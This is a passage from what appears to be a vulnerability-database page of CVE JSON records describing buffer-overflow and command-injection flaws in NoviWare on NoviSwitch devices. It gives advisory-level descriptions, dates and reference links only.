{
"name": "42518",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/42518/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-12786",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Network interfaces of the cliengine and noviengine services, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because there is a stack-based buffer overflow during unserialization of packet data."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "42518",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/42518/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-12786",
"datePublished": "2017-08-22T17:00:00",
"dateReserved": "2017-08-10T00:00:00",
"dateUpdated": "2024-08-05T18:51:06.333Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2017-12785 (GCVE-0-2017-12785)
Vulnerability from nvd – Published: 2017-08-22 17:00 – Updated: 2024-08-05 18:51
VLAI?
Summary
The novish command-line interface, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, is prone to a buffer overflow in the "show log cli" command. This could be used by a read-only user (monitor role) to gain privileged (root) code execution on the switch via command injection.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T18:51:06.170Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "42518",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/42518/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2017-08-22T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The novish command-line interface, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, is prone to a buffer overflow in the \"show log cli\" command. This could be used by a read-only user (monitor role) to gain privileged (root) code execution on the switch via command injection."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-22T16:57:02",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "42518",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/42518/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-12785",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The novish command-line interface, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, is prone to a buffer overflow in the \"show log cli\" command. This could be used by a read-only user (monitor role) to gain privileged (root) code execution on the switch via command injection."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "42518",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/42518/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-12785",
"datePublished": "2017-08-22T17:00:00",
"dateReserved": "2017-08-10T00:00:00",
"dateUpdated": "2024-08-05T18:51:06.170Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2020-13122 (GCVE-0-2020-13122)
Vulnerability from cvelistv5 – Published: 2020-08-17 15:59 – Updated: 2024-08-04 12:11
VLAI?
Summary
The novish command-line interface, included in NoviFlow NoviWare before NW500.2.12 and deployed on NoviSwitch devices, is vulnerable to command injection in the "show status destination ipaddr" command. This could be used by a read-only user (monitoring group) or admin to execute commands on the operating system.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T12:11:18.611Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://drive.google.com/file/d/1iL4cc0ZbQK9s190DbFQD7mWYbBH-vlJb/view?usp=sharing"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2020-06-17T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The novish command-line interface, included in NoviFlow NoviWare before NW500.2.12 and deployed on NoviSwitch devices, is vulnerable to command injection in the \"show status destination ipaddr\" command. This could be used by a read-only user (monitoring group) or admin to execute commands on the operating system."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-08-17T15:59:25",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://drive.google.com/file/d/1iL4cc0ZbQK9s190DbFQD7mWYbBH-vlJb/view?usp=sharing"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2020-13122",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The novish command-line interface, included in NoviFlow NoviWare before NW500.2.12 and deployed on NoviSwitch devices, is vulnerable to command injection in the \"show status destination ipaddr\" command. This could be used by a read-only user (monitoring group) or admin to execute commands on the operating system."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://drive.google.com/file/d/1iL4cc0ZbQK9s190DbFQD7mWYbBH-vlJb/view?usp=sharing",
"refsource": "MISC",
"url": "https://drive.google.com/file/d/1iL4cc0ZbQK9s190DbFQD7mWYbBH-vlJb/view?usp=sharing"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2020-13122",
"datePublished": "2020-08-17T15:59:25",
"dateReserved": "2020-05-16T00:00:00",
"dateUpdated": "2024-08-04T12:11:18.611Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2017-12785 (GCVE-0-2017-12785)
Vulnerability from cvelistv5 – Published: 2017-08-22 17:00 – Updated: 2024-08-05 18:51
VLAI?
Summary
The novish command-line interface, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, is prone to a buffer overflow in the "show log cli" command. This could be used by a read-only user (monitor role) to gain privileged (root) code execution on the switch via command injection.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T18:51:06.170Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "42518",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/42518/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2017-08-22T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The novish command-line interface, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, is prone to a buffer overflow in the \"show log cli\" command. This could be used by a read-only user (monitor role) to gain privileged (root) code execution on the switch via command injection."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-22T16:57:02",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "42518",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/42518/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-12785",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The novish command-line interface, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, is prone to a buffer overflow in the \"show log cli\" command. This could be used by a read-only user (monitor role) to gain privileged (root) code execution on the switch via command injection."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "42518",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/42518/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-12785",
"datePublished": "2017-08-22T17:00:00",
"dateReserved": "2017-08-10T00:00:00",
"dateUpdated": "2024-08-05T18:51:06.170Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2017-12787 (GCVE-0-2017-12787)
Vulnerability from cvelistv5 – Published: 2017-08-22 17:00 – Updated: 2024-08-05 18:51
VLAI?
Summary
A network interface of the novi_process_manager_daemon service, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because incoming packet data can contain embedded OS commands, and can also trigger a stack-based buffer overflow.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T18:51:07.224Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "42518",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/42518/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2017-08-22T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "A network interface of the novi_process_manager_daemon service, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because incoming packet data can contain embedded OS commands, and can also trigger a stack-based buffer overflow."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-22T16:57:02",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "42518",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/42518/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-12787",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A network interface of the novi_process_manager_daemon service, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because incoming packet data can contain embedded OS commands, and can also trigger a stack-based buffer overflow."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "42518",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/42518/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-12787",
"datePublished": "2017-08-22T17:00:00",
"dateReserved": "2017-08-10T00:00:00",
"dateUpdated": "2024-08-05T18:51:07.224Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2017-12786 (GCVE-0-2017-12786)
Vulnerability from cvelistv5 – Published: 2017-08-22 17:00 – Updated: 2024-08-05 18:51
VLAI?
Summary
Network interfaces of the cliengine and noviengine services, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because there is a stack-based buffer overflow during unserialization of packet data.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T18:51:06.333Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "42518",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/42518/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2017-08-22T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Network interfaces of the cliengine and noviengine services, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because there is a stack-based buffer overflow during unserialization of packet data."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-22T16:57:02",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "42518",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/42518/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-12786",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Network interfaces of the cliengine and noviengine services, included in the NoviWare software distribution through NW400.2.6 and deployed on NoviSwitch devices, can be inadvertently exposed if an operator attempts to modify ACLs, because of a bug when ACL modifications are applied. This could be leveraged by remote, unauthenticated attackers to gain resultant privileged (root) code execution on the switch, because there is a stack-based buffer overflow during unserialization of packet data."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "42518",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/42518/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-12786",
"datePublished": "2017-08-22T17:00:00",
"dateReserved": "2017-08-10T00:00:00",
"dateUpdated": "2024-08-05T18:51:06.333Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}